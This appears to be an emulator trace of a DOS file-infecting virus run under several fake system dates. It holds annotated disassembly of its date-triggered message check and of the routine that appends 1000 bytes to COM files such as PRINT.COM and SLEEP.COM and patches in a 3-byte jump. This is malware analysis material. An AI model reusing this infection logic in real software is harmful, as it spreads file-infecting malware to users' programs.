0x12ffd: sub ax, 3  ; ax = length - 3
0x13000: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:14.002422817Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.010097123Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.011537662Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.022096122Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.023796574Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.031377991Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.033948795Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.043052781Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.054102201Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.055782716Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.058396252Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.059667985Z 26 PC: 12a8a | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:14.061069687Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12a9d: nop
0x12a9e: add dx, 0  ; adds zero; dx is still 1990
0x12aa1: cmp cx, dx  ; cx = current year
0x12aa3: jg 0x12ac6  ; year > 1990: go to 0x12ac6 (past the end of this window)
0x12aa5: je 0x12aaa  ; year == 1990: continue with the month check
0x12aa7: jmp 0x12af6  ; year < 1990: go to 0x12af6, skipping the checks below
0x12aa9: nop
0x12aaa: mov ah, 0x2a  ; Get date again
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9 (the window at 0x12e97 uses 0xa)
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue
0x12ab5: jmp 0x12af6  ; month < 9: skip
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date a third time
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4 for a comparison that lies past the end of this window
2018-12-25T12:36:14.064452153Z 9 PC: 12ad0 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:14.070670482Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.075725578Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.079527134Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.086084772Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.097183361Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.106323802Z 87 PC: 12be0 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:14.107889911Z 44 PC: 12bec | Get time 0x12bec: and dh, 7  ; keep the low 3 bits of the seconds value
0x12bef: jmp 0x12bf2  ; unconditional; the masked value is not tested inside this window
0x12bf1: nop
0x12bf2: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12bf4: mov cx, 3  ; byte count = 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si  ; buffer = si + 0xd
0x12bfd: int 0x21
0x12bff: jb 0x12c56  ; CF set (DOS error): jump to 0x12c56, logged in the trace as the return address of the 3-byte write
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56  ; fewer than 3 bytes read: same exit
0x12c06: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12c09: mov cx, 0
0x12c0c: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax  ; cx = low word of the file length
0x12c15: sub ax, 3  ; ax = length - 3
0x12c18: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:14.110580024Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.118244663Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.120904538Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.133746411Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.136446156Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.145539824Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.147279246Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.156167499Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.168496051Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC | Syscall Name
2018-12-25T12:36:14.072667628Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:14.074030607Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:14.075102992Z 26 PC: 12e72 | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:14.075997109Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12e85: nop
0x12e86: add dx, 0  ; adds zero; dx is still 1990
0x12e89: cmp cx, dx  ; cx = current year
0x12e8b: jg 0x12eae  ; year > 1990: go to 0x12eae (past the end of this window)
0x12e8d: je 0x12e92  ; year == 1990: continue with the month check
0x12e8f: jmp 0x12ede  ; year < 1990: go to 0x12ede, skipping the checks below
0x12e91: nop
0x12e92: mov ah, 0x2a  ; Get date again
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue
0x12e9d: jmp 0x12ede  ; month < 10: skip
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date a third time
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10 for a comparison that lies past the end of this window
2018-12-25T12:36:14.078654156Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:14.084419835Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:14.089585397Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:14.123636913Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:14.135800825Z 87 PC: 12fc8 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:14.138002108Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7  ; keep the low 3 bits of the seconds value
0x12fd7: jmp 0x12fda  ; unconditional; the masked value is not tested inside this window
0x12fd9: nop
0x12fda: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12fdc: mov cx, 3  ; byte count = 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si  ; buffer = si + 0xd
0x12fe5: int 0x21
0x12fe7: jb 0x1303e  ; CF set (DOS error): jump to 0x1303e, logged in the trace as the return address of the 3-byte write
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e  ; fewer than 3 bytes read: same exit
0x12fee: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax  ; cx = low word of the file length
0x12ffd: sub ax, 3  ; ax = length - 3
0x13000: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:14.141015257Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.147266312Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.148683988Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.158563299Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.160309205Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.16662384Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.16849344Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.17633919Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.185843499Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.18717026Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.188823666Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.190035242Z 26 PC: 12a8a | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:14.191944493Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12a9d: nop
0x12a9e: add dx, 0  ; adds zero; dx is still 1990
0x12aa1: cmp cx, dx  ; cx = current year
0x12aa3: jg 0x12ac6  ; year > 1990: go to 0x12ac6 (past the end of this window)
0x12aa5: je 0x12aaa  ; year == 1990: continue with the month check
0x12aa7: jmp 0x12af6  ; year < 1990: go to 0x12af6, skipping the checks below
0x12aa9: nop
0x12aaa: mov ah, 0x2a  ; Get date again
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9 (the window at 0x12e97 uses 0xa)
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue
0x12ab5: jmp 0x12af6  ; month < 9: skip
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date a third time
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4 for a comparison that lies past the end of this window
2018-12-25T12:36:14.195819716Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.201983784Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.204441042Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.211832004Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.221664444Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.228364861Z 87 PC: 12be0 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:14.230404827Z 44 PC: 12bec | Get time 0x12bec: and dh, 7  ; keep the low 3 bits of the seconds value
0x12bef: jmp 0x12bf2  ; unconditional; the masked value is not tested inside this window
0x12bf1: nop
0x12bf2: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12bf4: mov cx, 3  ; byte count = 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si  ; buffer = si + 0xd
0x12bfd: int 0x21
0x12bff: jb 0x12c56  ; CF set (DOS error): jump to 0x12c56, logged in the trace as the return address of the 3-byte write
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56  ; fewer than 3 bytes read: same exit
0x12c06: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12c09: mov cx, 0
0x12c0c: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax  ; cx = low word of the file length
0x12c15: sub ax, 3  ; ax = length - 3
0x12c18: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:14.232469437Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.238714041Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.240522529Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.252061572Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.253483768Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.260204832Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.26167075Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.268191464Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.280519592Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC | Syscall Name
2018-12-25T12:36:14.217670733Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:14.219355565Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:14.220396188Z 26 PC: 12e72 | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:14.221380632Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12e85: nop
0x12e86: add dx, 0  ; adds zero; dx is still 1990
0x12e89: cmp cx, dx  ; cx = current year
0x12e8b: jg 0x12eae  ; year > 1990: go to 0x12eae (past the end of this window)
0x12e8d: je 0x12e92  ; year == 1990: continue with the month check
0x12e8f: jmp 0x12ede  ; year < 1990: go to 0x12ede, skipping the checks below
0x12e91: nop
0x12e92: mov ah, 0x2a  ; Get date again
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue
0x12e9d: jmp 0x12ede  ; month < 10: skip
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date a third time
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10 for a comparison that lies past the end of this window
; Linear listing from the return address of the second Get date call: month and day checks, then the INT 21h AH=09h display call.
; Not an execution trace: the next row logged in this run is Find first file, with no Display string row.
2018-12-25T12:36:14.224319805Z 42 PC: 12e96 | Get date 0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue with the day check
0x12e9d: jmp 0x12ede  ; month < 10: skip to 0x12ede (past the end of this window)
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date again
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10
0x12ea7: cmp dl, bh  ; dl = day of month
0x12ea9: jge 0x12eae  ; day >= 10: reach the display call
0x12eab: jmp 0x12ede  ; day < 10: skip
0x12ead: nop
0x12eae: mov dx, 0x1e
0x12eb1: nop
0x12eb2: add dx, si  ; ds:dx = si + 0x1e, address of the string to print
0x12eb4: mov ah, 9  ; INT 21h AH=09h: print '$'-terminated string
0x12eb6: int 0x21
0x12eb8: mov byte ptr [0x364], 0  ; clears the byte at ds:0x364; its role is not visible in this window
2018-12-25T12:36:14.226412299Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:14.232031518Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:14.237491735Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:14.252424731Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:14.25854695Z 87 PC: 12fc8 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:14.259690051Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7  ; keep the low 3 bits of the seconds value
0x12fd7: jmp 0x12fda  ; unconditional; the masked value is not tested inside this window
0x12fd9: nop
0x12fda: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12fdc: mov cx, 3  ; byte count = 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si  ; buffer = si + 0xd
0x12fe5: int 0x21
0x12fe7: jb 0x1303e  ; CF set (DOS error): jump to 0x1303e, logged in the trace as the return address of the 3-byte write
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e  ; fewer than 3 bytes read: same exit
0x12fee: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax  ; cx = low word of the file length
0x12ffd: sub ax, 3  ; ax = length - 3
0x13000: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:14.261732918Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.267589107Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.269545106Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.27784345Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.278997324Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.285038902Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.286995734Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.29434623Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.303755839Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.306718229Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.308208169Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.309592448Z 26 PC: 12a8a | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:14.311098381Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12a9d: nop
0x12a9e: add dx, 0  ; adds zero; dx is still 1990
0x12aa1: cmp cx, dx  ; cx = current year
0x12aa3: jg 0x12ac6  ; year > 1990: go to 0x12ac6 (past the end of this window)
0x12aa5: je 0x12aaa  ; year == 1990: continue with the month check
0x12aa7: jmp 0x12af6  ; year < 1990: go to 0x12af6, skipping the checks below
0x12aa9: nop
0x12aaa: mov ah, 0x2a  ; Get date again
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9 (the window at 0x12e97 uses 0xa)
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue
0x12ab5: jmp 0x12af6  ; month < 9: skip
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date a third time
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4 for a comparison that lies past the end of this window
; Linear listing from the return address of the second Get date call: month and day checks, then the INT 21h AH=09h display call.
; Not an execution trace: the next row logged in this run is Find first file, with no Display string row.
2018-12-25T12:36:14.313175657Z 42 PC: 12aae | Get date 0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue with the day check
0x12ab5: jmp 0x12af6  ; month < 9: skip to 0x12af6 (past the end of this window)
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date again
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4
0x12abf: cmp dl, bh  ; dl = day of month
0x12ac1: jge 0x12ac6  ; day >= 4: reach the display call
0x12ac3: jmp 0x12af6  ; day < 4: skip
0x12ac5: nop
0x12ac6: mov dx, 0x1e
0x12ac9: nop
0x12aca: add dx, si  ; ds:dx = si + 0x1e, address of the string to print
0x12acc: mov ah, 9  ; INT 21h AH=09h: print '$'-terminated string
0x12ace: int 0x21
0x12ad0: mov byte ptr [0x364], 0  ; clears the byte at ds:0x364; its role is not visible in this window
2018-12-25T12:36:14.31529396Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.321538488Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.323960339Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.32927408Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.342134202Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.348444282Z 87 PC: 12be0 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:14.349794421Z 44 PC: 12bec | Get time 0x12bec: and dh, 7  ; keep the low 3 bits of the seconds value
0x12bef: jmp 0x12bf2  ; unconditional; the masked value is not tested inside this window
0x12bf1: nop
0x12bf2: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12bf4: mov cx, 3  ; byte count = 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si  ; buffer = si + 0xd
0x12bfd: int 0x21
0x12bff: jb 0x12c56  ; CF set (DOS error): jump to 0x12c56, logged in the trace as the return address of the 3-byte write
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56  ; fewer than 3 bytes read: same exit
0x12c06: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12c09: mov cx, 0
0x12c0c: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax  ; cx = low word of the file length
0x12c15: sub ax, 3  ; ax = length - 3
0x12c18: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:14.352562517Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.358764748Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.360062444Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.37125101Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.373841592Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.385919623Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.388994773Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.480090731Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.533032862Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number in AH, decimal) | PC | Syscall Name
2018-12-25T12:36:14.330014261Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:14.331720943Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:14.335532199Z 26 PC: 12e72 | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:14.337056899Z 42 PC: 12e82 | Get date 0x12e82: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12e85: nop
0x12e86: add dx, 0  ; adds zero; dx is still 1990
0x12e89: cmp cx, dx  ; cx = current year
0x12e8b: jg 0x12eae  ; year > 1990: go to 0x12eae (past the end of this window)
0x12e8d: je 0x12e92  ; year == 1990: continue with the month check
0x12e8f: jmp 0x12ede  ; year < 1990: go to 0x12ede, skipping the checks below
0x12e91: nop
0x12e92: mov ah, 0x2a  ; Get date again
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa  ; threshold 10
0x12e99: cmp dh, bh  ; dh = month
0x12e9b: jge 0x12ea0  ; month >= 10: continue
0x12e9d: jmp 0x12ede  ; month < 10: skip
0x12e9f: nop
0x12ea0: mov ah, 0x2a  ; Get date a third time
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa  ; threshold 10 for a comparison that lies past the end of this window
2018-12-25T12:36:14.339626055Z 9 PC: 12eb8 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:14.353829215Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:14.361343284Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:14.367802373Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:14.384604531Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:14.392384055Z 87 PC: 12fc8 | Get or set file date and time
; Linear listing from the PC logged after INT 21h AH=2Ch (Get time: DH=seconds): 3-byte read from the file opened just before, then a seek to its end.
2018-12-25T12:36:14.394036888Z 44 PC: 12fd4 | Get time 0x12fd4: and dh, 7  ; keep the low 3 bits of the seconds value
0x12fd7: jmp 0x12fda  ; unconditional; the masked value is not tested inside this window
0x12fd9: nop
0x12fda: mov ah, 0x3f  ; INT 21h AH=3Fh: read from handle (bx is set outside this window)
0x12fdc: mov cx, 3  ; byte count = 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si  ; buffer = si + 0xd
0x12fe5: int 0x21
0x12fe7: jb 0x1303e  ; CF set (DOS error): jump to 0x1303e, logged in the trace as the return address of the 3-byte write
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e  ; fewer than 3 bytes read: same exit
0x12fee: mov ax, 0x4202  ; INT 21h AH=42h AL=02h: seek relative to end of file
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0  ; offset cx:dx = 0, so the call returns the file length in dx:ax
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax  ; cx = low word of the file length
0x12ffd: sub ax, 3  ; ax = length - 3
0x13000: mov word ptr [si + 0x11], ax  ; saved at si+0x11; presumably the rel16 of a 3-byte near jump to the appended 1000 bytes (the trace writes 3 bytes after a second seek) -- confirm
2018-12-25T12:36:14.397600737Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.404620835Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.406270569Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.430995395Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.433212422Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.441807604Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.444225068Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.45352622Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.464834577Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.46670014Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.4684687Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.469780718Z 26 PC: 12a8a | Set disk transfer address
; Linear listing from the PC logged after INT 21h AH=2Ah (Get date: CX=year, DH=month, DL=day); not an execution trace.
2018-12-25T12:36:14.471046809Z 42 PC: 12a9a | Get date 0x12a9a: mov dx, 0x7c6  ; dx = 0x7c6 = 1990, the year the date check compares against
0x12a9d: nop
0x12a9e: add dx, 0  ; adds zero; dx is still 1990
0x12aa1: cmp cx, dx  ; cx = current year
0x12aa3: jg 0x12ac6  ; year > 1990: go to 0x12ac6 (past the end of this window)
0x12aa5: je 0x12aaa  ; year == 1990: continue with the month check
0x12aa7: jmp 0x12af6  ; year < 1990: go to 0x12af6, skipping the checks below
0x12aa9: nop
0x12aaa: mov ah, 0x2a  ; Get date again
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9  ; threshold 9 (the window at 0x12e97 uses 0xa)
0x12ab1: cmp dh, bh  ; dh = month
0x12ab3: jge 0x12ab8  ; month >= 9: continue
0x12ab5: jmp 0x12af6  ; month < 9: skip
0x12ab7: nop
0x12ab8: mov ah, 0x2a  ; Get date a third time
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4  ; threshold 4 for a comparison that lies past the end of this window
2018-12-25T12:36:14.474637127Z 9 PC: 12ad0 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:14.484072343Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.491092102Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.496555519Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.503325284Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.520415094Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.531556364Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:14.534363508Z 44 PC: 12bec | Get time
0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
